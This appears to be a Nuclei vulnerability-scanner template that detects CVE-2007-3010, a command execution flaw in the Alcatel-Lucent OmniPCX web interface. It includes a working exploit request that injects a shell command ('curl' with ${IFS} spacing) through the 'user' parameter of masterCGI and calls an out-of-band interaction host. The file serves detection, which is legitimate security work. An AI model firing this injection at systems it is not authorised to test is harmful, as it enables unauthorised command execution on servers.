id: CVE-2007-3010

info:
  name: Alcatel-Lucent OmniPCX - Remote Command Execution
  author: king-alexander
  severity: high
  description: |
    The OmniPCX web interface has a script "masterCGI" with a remote command execution vulnerability via the "user" parameter.
  impact: |
   Any user with access to the web interface could execute arbitrary commands with the permissions of the webservers.
  remediation: |
    Update to supported versions that filter shell metacharacters in the "user" parameter.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2007-3010
    - https://marc.info/?l=full-disclosure&m=119002152126755&w=2
  tags: alcatel,cve,cve2007,kev,rce

http:
  - method: GET
    path:
      # Spaces must be encoded with the internal field separator "${IFS}" to execute the command.
      - "{{BaseURL}}/cgi-bin/masterCGI?ping=nomip&user=;curl${IFS}https://{{interactsh-url}};"

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"